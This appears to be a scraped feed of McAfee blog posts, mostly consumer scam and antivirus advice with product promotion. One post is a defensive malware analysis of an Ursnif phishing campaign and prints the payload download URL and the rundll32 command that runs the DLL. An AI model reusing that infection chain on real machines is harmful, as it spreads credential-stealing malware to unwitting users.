Sometimes, a criminal is skilled enough to hack the website of a large online retailer. When a scammer infiltrates a retailer’s website, they can redirect where the links on that site lead. This is called formjacking.  

For example, you might go to an e-commerce store to buy a jacket. You find the jacket and put it in your online shopping cart. You click “check out,” and you’re taken to a form that collects your credit card information. What you don’t know is that the checkout form is fake. Your credit card number is going directly to the scammers 

Whenever you’re redirected from a website to make a payment or enter in information, always check the URL. If the form is legitimate, it will have the same URL as the site you were on. A fake form will have a URL that’s close to but not exactly the same as the original site. 

Scareware scams (fake antivirus)

These scams are similar to tech support scams. However, instead of urging you to speak directly with a fake tech support person, their goal is to get you to download a fake antivirus software product (scareware).  

You’ll see a pop-up that says your computer has a virus, malware, or some other problem. The only way to get rid of the problem is to install the security software the pop-up links to. You think you’re downloading antivirus software that will save your computer.  

What you’re actually downloading is malicious software. There are several types of malware. The program might be ransomware that locks up your information until you pay the scammers or spyware that tracks your online activity.  

To avoid this scam, never download antivirus software from a pop-up. You’ll be much better off visiting the website of a reputable company, like McAfee, to download antivirus software 

Credit repair scams

Dealing with credit card debt can be extremely stressful. Scammers know this and try to capitalize off it. They’ll send emails posing as credit experts and tell you they can help you fix your credit or relieve some of your debt. They might even claim they can hide harmful details on your credit report. 

All you have to do is pay a small fee. Of course, after you pay the fee, the “credit expert” disappears without helping you out with your credit at all. Generally, legitimate debt settlement firms won’t charge you upfront. If a credit relief company charges you a fee upfront, that’s a red flag.  

Before you enter into an agreement with any credit service, check out their reputation. Do an online search on the company to see what you can find. If there’s nothing about the credit repair company online, it’s probably fake.  

What can you do if you get scammed online?

Admitting that you’ve fallen for an online scam can be embarrassing. But reporting a scammer can help stop them from taking advantage of anyone else. If you’ve been the victim of an online scam, try contacting your local police department and filing a report with the Federal Trade Commission (FTC).  

Several other law enforcement organizations handle different types of fraud. Here are a few examples of institutions that can help you report scams 

Discover how McAfee can keep you and your info safe online

Fraudsters shouldn’t stop you from enjoying your time online. Just by learning to spot an online scam, you can greatly strengthen your immunity to cybercrimes 

For an even greater internet experience, you’ll want the right tools to protect yourself online. McAfee’s Total Protection services can help you confidently surf the web by providing all-in-one protection for your personal info and privacy. This includes identity protection — which comes with 24/7 monitoring of your email addresses and bank accounts — and antivirus software to help safeguard your internet connection.  

Get the peace of mind that comes with McAfee having your back. 

The post How to Recognize an Online Scammer appeared first on McAfee Blog.

]]>
Phishing Campaigns featuring Ursnif Trojan on the Rise https://www.mcafee.com/blogs/other-blogs/mcafee-labs/phishing-campaigns-featuring-ursnif-trojan/ Wed, 08 Jun 2022 04:29:40 +0000 https://www.mcafee.com/blogs/?p=153472

Authored by Jyothi Naveen and Kiran Raj McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft...

The post Phishing Campaigns featuring Ursnif Trojan on the Rise appeared first on McAfee Blog.

]]>

Authored by Jyothi Naveen and Kiran Raj

McAfee Labs have been observing a spike in phishing campaigns that utilize Microsoft office macro capabilities. These malicious documents reach victims via mass spam E-mail campaigns and generally invoke urgency, fear, or similar emotions, leading unsuspecting users to promptly open them. The purpose of these spam operations is to deliver malicious payloads to as many people as possible.

A recent spam campaign was using malicious word documents to download and execute the Ursnif trojan. Ursnif is a high-risk trojan designed to record various sensitive information. It typically archives this sensitive data and sends it back to a command-and-control server.

This blog describes how attackers use document properties and a few other techniques to download and execute the Ursnif trojan.

Threat Summary

  • The initial attack vector is a phishing email with a Microsoft Word document attachment.
  • Upon opening the document, VBA executes a malicious shellcode
  • Shellcode downloads the remote payload, Ursnif, and invokes rundll32.exe to execute it.

Infection Chain

The malware arrives through a phishing email containing a Microsoft Word document as an attachment. When the document is opened and macros are enabled, Word downloads a DLL (Ursnif payload). The Ursnif payload is then executed using rundll32.exe

Figure 1- flowchart of infection chain
Figure 1- flowchart of infection chain

Word Analysis

Macros are disabled by default and the malware authors are aware of this and hence present an image to entice the victims into enabling them.

Figure 2- Image of what the user sees upon opening the document
Figure 2- Image of what the user sees upon opening the document

VBA Macro Analysis of Word Document

Analyzing the sample statically with ‘oleId’ and ‘olevba’ indicates the suspicious vectors..

Figure 3- Oleid output
Figure 3- Oleid output
Figure 4- Olevba output
Figure 4- Olevba output

The VBA Macro is compatible with x32 and x64 architectures and is highly obfuscated as seen in Figure-5

Figure 5- Obfuscated VBA macro
Figure 5- Obfuscated VBA macro

To get a better understanding of the functionality, we have de-obfuscated the contents in the 2 figures shown below.

Figure 6- De-obfuscated VBA macro (stage 1)
Figure 6- De-obfuscated VBA macro (stage 1)
Figure 7- De-obfuscated VBA macro (stage 2)
Figure 7- De-obfuscated VBA macro (stage 2)

An interesting characteristic of this sample is that some of the strings like CLSID, URL for downloading Ursnif, and environment variables names are stored in custom document properties in reverse. As shown in Figure-7, VBA function “ActiveDocument.CustomDocumentProperties()” is used to retrieve the properties and uses “StrReverse” to reverse the contents. 

We can see the document properties in Figure-8  

Figure 8- Document properties
Figure 8- Document properties

Payload Download and Execution: 

The malicious macro retrieves hidden shellcode from a custom property named “Company” using the “cdec” function that converts the shellcode from string to decimal/hex value and executes it. The shellcode is shown below. 

Figure 9- Raw Company property
Figure 9- Raw Company property

The shellcode is written to memory and the access protection is changed to PAGE_EXECUTE_READWRITE. 

Figure 10- Code of VirtualProtect
Figure 10- Code of VirtualProtect
Figure 11- Shellcode’s memory and protection after calling VirtualProtect()
Figure 11- Shellcode’s memory and protection after calling VirtualProtect()

After adding the shellcode in memory, the environment variable containing the malicious URL of Ursnif payload is created. This Environment variable will be later used by the shellcode. 

Figure 12- Environment variable set in Winword.exe space
Figure 12- Environment variable set in Winword.exe space

The shellcode is executed with the use of the SetTimer API. SetTimer creates a timer with the specified time-out value mentioned and notifies a function when the time is elapsed. The 4th parameter used to call SetTimer is the pointer to the shellcode in memory which will be invoked when the mentioned time is elapsed. 

Figure 13- SetTimer function (Execution of shellCode)
Figure 13- SetTimer function (Execution of shellCode)

The shellcode downloads the file from the URL stored in the environmental variable and stores it as ” y9C4A.tmp.dll ” and executes it with rundll32.exe. 

URL  hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/ 
CMD  rundll32 “C:\Users\user\AppData\Local\Temp\y9C4A.tmp.dll”,DllRegisterServer 
Figure 14- Exports of Downloaded DLL
Figure 14- Exports of Downloaded DLL

After successful execution of the shellcode, the environment variable is removed. 

Figure 15- Removal of Environment Variable
Figure 15- Removal of Environment Variable

IOC 

TYPE  VALUE  PRODUCT  DETECTION NAME 
Main Word Document  6cf97570d317b42ef8bfd4ee4df21d217d5f27b73ff236049d70c37c5337909f  McAfee LiveSafe and Total Protection  X97M/Downloader.CJG 
Downloaded dll  41ae907a2bb73794bb2cff40b429e62305847a3e1a95f188b596f1cf925c4547  McAfee LiveSafe and Total Protection  Ursnif-FULJ 
URL to download dll  hxxp://docmasterpassb.top/kdv/x7t1QUUADWPEIQyxM6DT3vtrornV4uJcP4GvD9vM/  WebAdvisor  Blocked 

MITRE Attack Framework 

Technique ID  Tactic  Technique Details  Description 
T1566.001  Initial Access  Spear phishing Attachment  Manual execution by user 
T1059.005  Execution  Visual Basic  Malicious VBA macros 
T1218.011  Defense Evasion  Signed binary abuse  Rundll32.exe is used 
T1027  Defense Evasion  Obfuscation techniques  VBA and powershell base64 executions 
T1086  Execution  Powershell execution  PowerShell command abuse 

 Conclusion 

Macros are disabled by default in Microsoft Office applications, we suggest keeping it that way unless the document is received from a trusted source. The infection chain discussed in the blog is not limited to Word or Excel. Further threats may use other live-off-the-land tools to download its payloads.  

McAfee customers are protected against the malicious files and sites detailed in this blog with McAfee LiveSafe/Total Protection and McAfee Web Advisor. 

The post Phishing Campaigns featuring Ursnif Trojan on the Rise appeared first on McAfee Blog.

]]>
Types of Online Banking Scams and How to Avoid Them https://www.mcafee.com/blogs/tips-tricks/types-of-online-banking-scams-and-how-to-avoid-them/ Tue, 07 Jun 2022 13:25:07 +0000 https://www.mcafee.com/blogs/?p=150747

Online banking puts the ability to pay bills, check your balance, or transfer money at your fingertips. Unfortunately, it can...

The post Types of Online Banking Scams and How to Avoid Them appeared first on McAfee Blog.

]]>

Online banking puts the ability to pay bills, check your balance, or transfer money at your fingertips. Unfortunately, it can also make you vulnerable to scammers who may try to trick you into giving them access to your account.  

By remaining vigilant, though, you can avoid common scams. This article discusses mobile banking scams and how to avoid them. 

Most common online banking scams

Online banking can be super convenient — for both you and cybercriminals. And hackers may use a variety of tactics to gain access to your accounts. Most of these involve tricking you into giving them your account information. 

Phishing scams

With this type of online scam, fraudsters may send a text message or email that looks like it’s from your bank. Often, the message will ask for immediate action, such as confirming your information to keep the account from being closed.  

The message might even include a link to the bank, but it actually goes to a fraudulent website designed to look like the bank’s website. When you enter your account information, the scammers record it. 

Sometimes, the email asks you to call a fake customer service number. If you do, you’ll speak to someone who tries to get you to give over sensitive information, like your date of birth or Social Security number (SSN). 

Occasionally, scammers already have some of your personal information. To gain your trust, they might mention personal details like your date of birth or the last four digits of your SSN. They may have learned this information from your social media posts or accessed it in a data breach. 

Cracking passwords

Another way hackers may try to access your bank account is to steal or guess your password. If they can log into your account, they can use your sensitive information for personal gain, otherwise known as identity theft. They can then open credit card accounts in your name, purchase merchandise, or transfer money out of your account. 

Cybercriminals use technology to guess billions of passwords per second. However, it’s more difficult to guess long passwords with a combination of letters and numbers.  

For example, a computer can instantly guess a password consisting of eight letters. Adding one uppercase letter extends the time it takes to crack a password to 22 minutes. In contrast, a 12-character password with an uppercase letter, a number, and a symbol would take the computer 34,000 years to crack. 

Computer viruses

When you click a link or attachment in an email or download fake antivirus software, your device can become infected with malicious software or malware. A virus can let hackers view data from your device and use it to access your financial information or bank accounts 

Consider getting antivirus software to help protect your devices, like what’s offered through McAfee Total Protection. Our award-winning antivirus software provides 24/7 real-time threat protection against online threats like malware, viruses, ransomware, and phishing, across Apple and Android systems. 

Targeting computers on public Wi-Fi networks

Public Wi-Fi gives you convenient, free access to the internet in restaurants, airports, and department stores. But it can also be easy for hackers to see your private information on an open network that doesn’t require a password.  

If you log into your online bank account, your login information could be exposed, making you vulnerable to bank fraud. Shopping online with public Wi-Fi could also expose your credit card information. 

How to avoid online banking scams

Fortunately, you can protect yourself from cybercriminals with sensible precautions and a healthy dose of suspicion. Use the tips below to help safeguard your accounts from online banking scams. 

Secure your devices with McAfee

McAfee Total Protection provides all-in-one protection for your personal information and privacy. You’ll have coverage for all of your laptops, tablets, and smartphones on most operating systems — Windows, macOS, Android, or iOS. In addition to premium antivirus software, you get identity monitoring and a secure VPN that shields your data when using public Wi-Fi. 

Carefully assess any messages claiming to be your bank

You can better recognize phishing emails once you understand how banks communicate with customers. There are certain things legitimate banks never do. If you get a message like that, assume it’s fraudulent. Some other tips include: 

  • Calling: Banks or other financial institutions don’t call for your PIN or checking account number. Never provide this over the phone. Call your bank directly using the phone number on your credit card or bank statement if you want to confirm. 
  • Email: Your bank has no reason to email you for account information it already has. If you receive an email asking you to click a link or provide account information, assume it’s fraudulent. Don’t click any links and mark the email as spam. 
  • Text messages: If a message appears to be from your bank asking you to sign in or enter your PIN, it’s a scam. Banks never ask customers for this information by text. 
  • Urgent action: A common theme in phishing emails is the urgent call to action. Cybercriminals want to scare you into acting immediately without thinking. The email says there was suspicious activity on your account, and you should log in immediately to avoid having it frozen or closed. No legitimate business would close a customer’s account without giving reasonable notice. Contact your bank through your normal channels to check your balance and account activity if you aren’t sure. 
  • Typos: Misspelled words and grammatical errors are another red flag. Major corporations have professional editors to make sure the content is correct. 

Create strong passwords and update them regularly

At some point, almost everyone has used the same password for different websites. But this is one of the simplest ways for hackers to get into your accounts. If they figure out the password for one, they can sometimes access your other accounts.  

The most common passwords are:  

  • QWERTY 
  • Password  
  • 12345678 

Use unique passwords for each website. They should be 12 characters long and include numbers, lowercase letters, uppercase letters, and symbols. McAfee Total Protection includes a password manager to help generate and store your passwords in a single location. 

Always make sure you’re on the bank’s official website/app

If you get an email about an issue with your bank account, you can always go directly to your bank’s website. Don’t click any links in a text or email — just go directly to your bank’s website to check your account. Similarly, if you get a phone call, dial your bank directly using the official telephone number. 

Use two-factor authentication when logging into websites for your financial institutions. You’ll get a one-time code by text or email to use each time you log into your account. 

Be cautious of accessing your bank via public Wi-Fi

When you log onto public Wi-Fi, anyone can see your internet activity. For that reason, you shouldn’t log into your bank account with public Wi-Fi unless you’re using a virtual private network (VPN).  

McAfee Secure VPN protects your privacy by turning on automatically for unsecured networks. Your data is encrypted so it can’t be read by prying eyes. The VPN also keeps your online activity and physical location private and secure from advertisers. 

Check your bank statements regularly

Review your bank statements carefully each month to ensure there are no unauthorized transactions. Contact your bank immediately if you see any payments or withdrawals that you don’t recognize. 

See how McAfee keeps you and your data secure online 

Being vigilant and understanding how scammers work can help you avoid online banking scams. For an additional layer of security, use McAfee Total Protection. Our comprehensive cybersecurity services protect all of your devices with award-winning antivirus, a secure VPN for safe Wi-Fi connections, and advanced identity monitoring. There’s even a team of security experts available to assist you around the clock. 

With McAfee, you can bank online with ease knowing your personal data is secure. 

The post Types of Online Banking Scams and How to Avoid Them appeared first on McAfee Blog.

]]>
How to Quickly Remove Malware in 2022 https://www.mcafee.com/blogs/tips-tricks/how-to-quickly-remove-malware-in-2022-2/ Tue, 07 Jun 2022 11:39:23 +0000 https://www.mcafee.com/blogs/?p=151198

If you’re like most people, you probably use your computer for most of your online activities. It’s amazing what the...

The post How to Quickly Remove Malware in 2022 appeared first on McAfee Blog.

]]>

If you’re like most people, you probably use your computer for most of your online activities. It’s amazing what the internet can do to make our lives easier. But if you’ve spent any time online, you know the internet also comes with some risks. 

Malware (or malicious software) is one risk of living a connected life. Whether it comes from infected websites, innocent-looking email attachments, or applications and tools you think you can trust, malware can expose your private information to cybercriminals who may use it for personal gain. 

If you suspect that malicious software has infected your device, it’s important to remove it quickly to protect yourself.  

Though dealing with malware can be scary, there are a few things you can do. This article will explain how malware can infect devices and how you can remove it from them. 

How devices become infected with malware

There are many types of malware, which do their work in different ways. They can include viruses, worms, Trojans, spyware, adware, ransomware, and more. 

Some common ways that Windows PCs, Macs, tablets, and smartphones can get infected include: 

  • Phishing and malspam emails: These are emails — often posing as trusted sources — that try to trick you into revealing sensitive information, such as your credit card number and passwords, to different services. 
  • Peer-to-peer sharing (P2P sharing) and torrents: P2P sharing and torrents often offer software, games, and media for illegal downloading. They can also contain downloads spiked with malicious software code. 
  • Spoofed websites of well-known brands and organizations: Cybercriminals might pose as websites of legitimate organizations to trick you into downloading malware. Click on a link, and the malware downloads to your hard drive. 
  • External storage devices, such as USB drives: USB drives and other external storage devices are a popular way to exchange files between computers. However, if you find or receive a USB drive from an unknown source, don’t plug it into your machine. 
  • Compromised software: Sometimes, malware can compromise the software you download. It’s a good idea to only download through trusted sources. 
  • Adware, including pop-up ads: Pop-up ads are a nuisance when you click on a webpage, but they can also be laced with malware that’s released when you click on them. 
  • Fake mobile apps: These often pose as popular apps, such as fitness tracking tools or cryptocurrency applications. Download them, and your mobile device can become compromised. It’s best only to download apps from trusted sources.  

How can malware affect you?

Malware can affect you in a variety of ways. For example, malware can allow hackers to steal your private information, uncover passwords, cause financial issues for you or your company, delete files, and render your device unusable.  

Malware can also move from your computer to other devices, so you may unwittingly infect friends, family, or co-workers. It can gobble up your computer’s memory, slow its operation to a snail’s pace, and more. 

For these reasons, it’s a good idea to find out how to remove malware and learn to protect yourself from it in the first place. 

Signs malware  is infecting your device

The Federal Trade Commission (FTC) Consumer Information points out some ways to know if malware has infected your device, including if it: 

  • Suddenly slows down, crashes, or displays repeated error messages 
  • Won’t shut down or restart 
  • Prevents you from removing software 
  • Starts serving up a lot of pop-up ads, inappropriate ads, or ads that interfere with page content 
  • Displays ads in places you wouldn’t usually see them, such as government websites 
  • Displays unexpected toolbars or icons in your web browser, such as Chrome or Safari  
  • Changes your default search engine or displays new tabs or websites you didn’t open 
  • Repeatedly changes your homepage 
  • Sends emails from your personal account that you didn’t write 
  • Runs out of battery life more quickly than normal 

Malware removal on your PC

How to remove malware from your devices

If you think your computer, smartphone or tablet has been infected by malware, the first step is to stop ​​shopping, banking, and doing other things online that involve usernames, passwords, or other sensitive information until you have the problem resolved. 

If you don’t have an antivirus program on your device, it’s a good idea to get one. McAfee’s antivirus software provides award-winning protection for your data and devices. It’s important to get antivirus software from a trusted name because some malware can even masquerade as security software. 

It’s also important to make sure that your operating system for your different devices and applications are up to date. Older programs and apps might not have the latest security features — cybercriminals are constantly devising new ways to get people’s information — and outdated software can have a harder time fighting off infection.  

Once your cybersecurity software is in place, you should: 

Scan your device for malware

If you have a PC with Windows 10 or 11, you already benefit from free virus threat protection with Microsoft Windows Defender. Windows Defender, or built-in Microsoft security, compares new files and programs against a database of known malware. It keeps an eye out for signs that an attack is underway, such as the encryption of key files.  

Defender can run in active, passive, and disabled mode. In active mode, it’s the primary antivirus app on the device. This means the program will scan files, remedy any threats, and show detected threats in your organization’s security reports and in the Windows Security app. 

Microsoft Defender will automatically turn off if you have another antivirus app installed and turned on. Microsoft Defender will turn back on automatically if you uninstall the other app. 

In passive mode, Microsoft Defender isn’t used as the primary antivirus app on the device. It’ll scan files and report any threats but it won’t remedy those threats. Finally, Microsoft Windows can’t detect or address threats if it is disabled or uninstalled. 

You can run quick and advanced scans in Windows Security. If you’re worried that a specific file or folder has been compromised, you can also run a manual scan by: 

  1. Right-clicking the file or folder in File Explorer 
  2. Selecting Scan with Microsoft Defender 

You’ll see the scan results and options for dealing with any potential threats. 

Microsoft Defender is also available to protect Android smartphones from viruses and malware. It can also help against phishing and phishing and scans your Android device automatically to track and identify potentially unwanted, and dangerous, applications on your device. 

Apple users, as well, have built-in antivirus software to help detect and fight off malware. Malware is commonly distributed across macOS systems by being embedded in a harmless-looking app 

Luckily, settings in Security & Privacy preferences allow you to designate the sources of software installed on your Mac. Just follow these steps: 

  1. Choose the Apple menu.  
  2. Select “System Preferences.” 
  3. Click “Security & Privacy.”  
  4. Click “General.” 
  5. If the lock at the bottom left is locked, click it to unlock the preferences pane. 
  6. Select the software sources from which you’ll allow software to be installed, including the Mac App Store and identified developers who are registered with Apple. 

Apple iPads and iPhones have strong built-in security and privacy protections, so it is up to the user on whether or not they want to install antivirus for additional malware protections. Apple boasts a “walled-garden” approach–meaning that their operating system is closed to outside apps and games not affiliated with their official app store unless you jailbreak the device.

Remember that while cybersecurity features built into devices are a great starting point, they’re not always comprehensive. That’s where antivirus software, like McAfee Total Protection, can help. It offers continuous protection against malware, viruses, phishing, ransomware, and other online threats. It also automatically updates so you don’t need to worry about manual upgrades.  

The security software also includes alerts before you connect to risky websites and offers one-click fixes to help you stay safe online. 

Quarantine or remove any viruses

Antivirus software like McAfee works to block malware from infecting your computer, smartphone, or tablet. If malware somehow does get through, it can act as a powerful malware scanner by searching every file on your device for infections.  

It can troubleshoot, look for vulnerabilities, and compile a list of infected software that can be quarantined (or isolated) to prevent it from doing harm and deleted at the end of the virus scan using removal tools 

McAfee’s anti-malware software updates its virus database by using an automatic web crawler that scans the internet, identifies online threats like malicious software, and figures out how to delete them. 

McAfee antivirus uses this data to automatically update your device’s protective set-upl, providing strong protection so nothing harmful gets in.  

Besides desktop computers, McAfee provides mobile security for both Android and Apple devices. For example, when you use your iPhone or Android phone on a public Wi-Fi system,  McAfee’s Wi-Fi privacy protection (VPN) in effect turns the public network into a private one, where you can surf safely. Of course, its antivirus app regularly scans for threats and malware while actively blocking them in real time, keeping your mobile devices protected. 

McAfee keeps your device secure

McAfee offers a variety of plans tailored to fit your needs and budget so your computer and other devices — including Android smartphones, Apple iPhones, and various tablets — are protected from malware and other online threats. 

McAfee is a leader in consumer security, and our antivirus software is used on more than 6 million devices. It’s easy to install and use, provides 24/7 real-time threat protection, and comes with a Virus Pledge — a money-back guarantee that it’ll remove all viruses from your protected devices. 

You can get antivirus software as part of McAfee’s Total Protection services. This includes all-in-one protection for your personal info and privacy, with identity restoration assistance and up to $1 million of identity theft coverage for data breaches. You also have access to identity monitoring, safe browsing, and a secure VPN.​ 

With McAfee, you can turn apprehension about malware into the peace of mind that comes from proper protection. 

The post How to Quickly Remove Malware in 2022 appeared first on McAfee Blog.

]]>
A Guide to Finding Out If Your Information Is on the Dark Web https://www.mcafee.com/blogs/tips-tricks/a-guide-to-finding-out-if-your-information-is-on-the-dark-web/ Mon, 06 Jun 2022 22:38:25 +0000 https://www.mcafee.com/blogs/?p=150721

It’s difficult to imagine what life was like before the internet. We log in daily to pay bills, shop, watch...

The post A Guide to Finding Out If Your Information Is on the Dark Web appeared first on McAfee Blog.

]]>

It’s difficult to imagine what life was like before the internet. We log in daily to pay bills, shop, watch movies, and check out what friends and family are up to on social media. While the internet has made life easier, we may not consider how our online activities can make personal information — such as our Social Security numbers (SSNs) or bank account and credit card numbers — vulnerable to cybercriminals on the dark web.

Fortunately, you can find out if your information is on the dark web and keep tabs on your sensitive information with extensive dark web monitoring, offered through McAfee’s Identity Protection services 

This article explains what the dark web is, how to find out if personal details have reached the dark web, and how to protect your sensitive information 

What is the dark web?

Unlike the surface web we use for things like shopping and online banking, the dark web is part of the internet that’s not indexed by search engines. It can only be accessed with special web browsers. A few widely known networks include Tor, I2P, and Riffle.  

Cybercriminals can browse, sell, or trade on dark websites with confidence and complete anonymity. Because of its highly layered encryption system, hackers can communicate without giving away their location, IP address, or identity.  

How does data end up on the dark web?

Data can end up on the dark web in several ways, including through data breaches, using public Wi-Fi, visiting a nonsecure website, and leaving an offline paper trail.  

A cybercriminal may hack into company databases and take personal data, such as email account addresses, passwords, and phone numbers. And while we all love to work at our favorite coffee shop, using an unsecured Wi-Fi network can leave our personal information in public view.  

That’s why using a virtual private network (VPN) like McAfee Secure VPN, which comes with bank-grade encryption to scramble your data, can be a good idea. You’ll also only want to visit encrypted webpages when browsing online — keep an eye out for URLs beginning with HTTPS rather than HTTP. The “S” means added security for you. Lastly, shred paper containing your personal information or lock it away until you can.  

How to find out if your information is on the dark web 

With identity monitoring through McAfee Identity Protection, you’ll receive notifications if we find your personal information on the dark web. Our extensive monitoring service keeps tabs on up to 60 unique types of personal data and can notify you up to 10 months sooner than similar services. Plus, you get peace of mind with up to $1 million of ID theft coverage and hands-on restoration support to help reclaim your identity after identity theft 

Can you remove your information from the dark web?

While you can’t remove your information once it’s on the dark web, there are plenty of steps you can take to help protect yourself and prevent your data from falling into the wrong hands. You can: 

  • Notify the credit bureaus: The three major credit bureaus (Experian, Equifax, and TransUnion) offer options to prevent fraudulent credit requests. If you’re looking to protect your credit data, request an option like two-factor authentication on all credit pulls when notifying the bureaus of your concern. 
  • Change your account passwords: Keeping your password secure is crucial to the safety of your online data when it comes to things like online banking and email accounts. Stay away from personal names, dates, or obvious preferences when creating or updating your passwords and use a password manager like McAfee True Key, which auto-saves and enters your passwords.  
  • Review your credit report: Staying up to date with the changes reflected on your credit report can help you identify suspicious activity or fraud alerts. Unexpected drops in your credit can be a sign of potential illegal activity. 
  • Track credit card statement charges: Credit cards are a large target for hackers looking to commit a cybercrime. Thankfully, there are ways to keep your credit card data secure, starting with regular reviews of your statements to ensure no unexpected charges or usage.  
  • Scan your online devices for viruses: Keeping your device free of viruses can help prevent hackers from taking your information in the first place. Start by downloading antivirus software, like what’s included in McAfee Total Protection, to prevent opportunities for viruses to infect your device or collect your secure data.  

6 tips to prevent your data from getting on the dark web

No one wants their information to end up on the dark web. Fortunately, you can do a few things to minimize your risk of exposure. Here are some tips you can use to keep your data safe.  

Secure your data with identity protection software from McAfee

Identity protection software from McAfee can help keep your information out of the hands of cybercriminals. Some features of McAfee identity protection include expert security support, award-winning antivirus protection, a password manager, and firewall protection. Choose the plan that works best for you and keep tabs on your personal information.  

Sign up for two-factor authentication on your devices

This extra layer of security double-checks your identity when signing into an online account. You enter your password as usual and a unique six-digit, one-time code is sent to a trusted device via text. This added step can help improve the security of your personal information.  

Use a unique password for each account

When creating or updating your account passwords, make sure to choose ones that are difficult to guess. Avoid using a pet’s name, your name, or other personal information that others can guess. It goes without saying, but don’t share any of your passwords. 

Consider what you share on social media

Shared content can tell a lot about someone. Have you ever shared the make and model of your first car, your favorite movie or band, or your high school graduation year? This information helps unsavory characters figure out online passwords and security questions. 

Change permission settings for app 

There are a lot of cool apps out there, and many are harmless. However, some may request access to your location, photos, contact list, and even microphone. Certain apps, especially those filled with malware, can then collect your data and share it with others. Fortunately, Android devices and Apple iPhones allow you to change your permission settings for apps. 

Use caution with suspicious emails

With so many emails arriving in our inboxes, we may not always pay close attention to what we’re opening. However, scammers may use phishing emails in an attempt to access your personal information. Sometimes, these emails are obvious, but they can also look legit and appear as a trusted company, such as your bank or credit card company. If something seems amiss, such as a billing error or an invoice, log in through the company’s website rather than click links inside the email.  

Discover how McAfee Total Protection keeps you safe online

No one wants their information on the dark web. Thankfully, there are several things you can do to keep your personal information secure, including all-in-one protection from McAfee. 

McAfee Total Protection comes with advanced identity monitoring, which provides faster and broader detection for your identity, plus premium antivirus software, safe browsing, and Secure VPN 

With easy setup and extensive monitoring, you can maintain your digital identity and gain peace of mind.  

The post A Guide to Finding Out If Your Information Is on the Dark Web appeared first on McAfee Blog.

]]>
Does Windows 10 or 11 Need Antivirus Software? https://www.mcafee.com/blogs/tips-tricks/does-windows-10-or-11-need-antivirus-software/ Mon, 06 Jun 2022 12:17:06 +0000 https://www.mcafee.com/blogs/?p=150703

If your PC runs on Windows 10, you’re in very good company. The Microsoft operating system is the most widely...

The post Does Windows 10 or 11 Need Antivirus Software? appeared first on McAfee Blog.

]]>

If your PC runs on Windows 10, you’re in very good company. The Microsoft operating system is the most widely used OS in the world. Many Windows 10 users have also been upgraded to Windows 11 through a rollout that began in 2021. Microsoft plans to complete the Windows update by mid-2022.

Unfortunately, its success as a widely used operating system makes Windows attractive to hackers. And if malicious software like malware can make a home in Windows, there are a lot of targets. So, this might raise the question of how best to protect your Windows 10 or 11 device.  

 Should you just use Windows DefenderMicrosoft’s free version of antivirus software — or buy additional protection?  

Read on to learn what Microsoft Defender covers and how additional virus protection can secure all of your connected devices. 

Does Windows 10 come with antivirus software?

For years, Microsoft has offered anti-malware protection, but the current version provides effective security against viruses. Windows Defender is a free antivirus tool that’s built into the Windows operating system 

While it’s considered one of the best free antivirus software programs, it doesn’t have any extra features that might come with paid security software. If you’re just looking for good antivirus software, though, Windows Defender can get the job done.  

How to check if Windows Defender is on

If you’re not using third-party antivirus protection, you’ll want to make sure that your Windows Defender antivirus coverage is working on your computer. Here’s how to check: 

  1. Go to the control panel and click System and Security. 
  2. Click Windows Defender Firewall. 
  3. A window will open showing if the firewall is on. 
  4. If you need to turn on Windows Defender, use the menu. 
  5. Close all browser windows and restart your computer. 

To make sure your Windows security is running, follow these steps: 

  1. Click CTRL+Alt+Del and select Task Manager. 
  2. Look at the tabs and click Services. 
  3. Scroll down to Windows Defender and see if it is classified as “running.” 

Do you need additional antivirus software?

With built-in coverage, you may wonder if you should invest in paid antivirus software. The answer is, of course, yes! It can be a good idea to get another antivirus solution because blocking malware and viruses should just be one part of your threat protection 

Today’s cybercriminals are using elaborate ruses to try to access your personal information, such as your bank and credit card numbers. And some of their scams might even target your devices with risky apps or links on social media.  

As they always say, it’s better to be safe than sorry! Having another antivirus program can make sure you have real-time protection and access to the latest security features. 

4 features you want in an antivirus software

There are a lot of antivirus protection programs out there, but they aren’t all created equal. When looking for the best antivirus software for your needs, here are some things to consider for your devices running on Windows 10 or 11. 

Compatibility across multiple operating systems

If you have a Windows PC, use an iPhone, and your tablet runs on Chrome, it helps to have an antivirus app that works across multiple operating systems. The good news is that McAfee Total Protection is compatible with Windows, Mac, iOS, and Android devices, so you can continue enjoying all of your different devices without losing protection. 

Protection against a variety of online threats

For greater cybersecurity, antivirus software should defend against a variety of online threats like viruses, spyware, and ransomware. And that’s exactly what you get with McAfee Total Protection. Our antivirus software can also help you avoid phishing attacks, which are fake messages to trick you into providing information or clicking a malicious link. The software will give you a warning when it recognizes a risky link, website, or file. 

Easy to use

Functionality is another thing you’ll want to consider when looking for antivirus software. If the program isn’t easy to use to begin with — especially if you want to easily manage multiple devices — what good will it do you?  

But you don’t have to worry with McAfee Total Protection, which allows you to connect and manage all of your computers and mobile devices from one single dashboard. 

Real-time and scheduled scanning

To keep your devices free from online threats like malware, good antivirus software will scan your files for threats. McAfee Total Protection provides 24/7 protection with real-time, on-demand, and scheduled scanning of files and applications.  

Additional features beyond antivirus software

McAfee Total Protection was developed with an understanding of how cybercriminals operate. Scammers may use a variety of tactics to try to steal your personal information, so our all-in-one protection also includes:  

  1. VPN: A virtual private network (VPN) is one of the biggest benefits of using third-party antivirus protection. When you connect to public Wi-Fi, such as in a coffee shop, it’s possible for a hacker to see your data. A VPN encrypts your data to protect it from prying eyes. It also conceals your device’s IP address and geolocation. 
  2. Identity monitoring: Get 24/7 monitoring of your email addresses and bank accounts with up to $1 million of ID theft coverage with McAfee Total Protection. With early detection, an easy setup, and extensive monitoring (keeping tabs on up to 60 unique types of personal information), you can continue to live your best life online.  
  3. Protection score: We’ll look at the health of your online protection and give you a protection score. We’ll also recommend how to address weak spots and improve your security. 
  4. PC optimization: There’s nothing more frustrating than trying to work on a computer that loads pages slowly or keeps freezing. To help speed up your online activities, McAfee  PC Optimizer automatically pauses auto-play on pop-up videos. This gives you more bandwidth and saves battery power. The software also disposes of temporary files and cookies to free disk space. 
  5. Password manager: One good way to keep your data secure is to use strong passwords that are unique for each website. Our password manager generates complex passwords, stores them, and even lets you access shared passwords on your mobile devices. 

Personalized protection for your digital life

Using Microsoft’s built-in antivirus software can protect your Windows devices from viruses and malware. But to really keep your network and all of your devices secure, it’s good to rely on comprehensive protection like McAfee Total Protection. With services like identity monitoring, safe browsing, and a secure VPN, you can enjoy the internet without worry. 

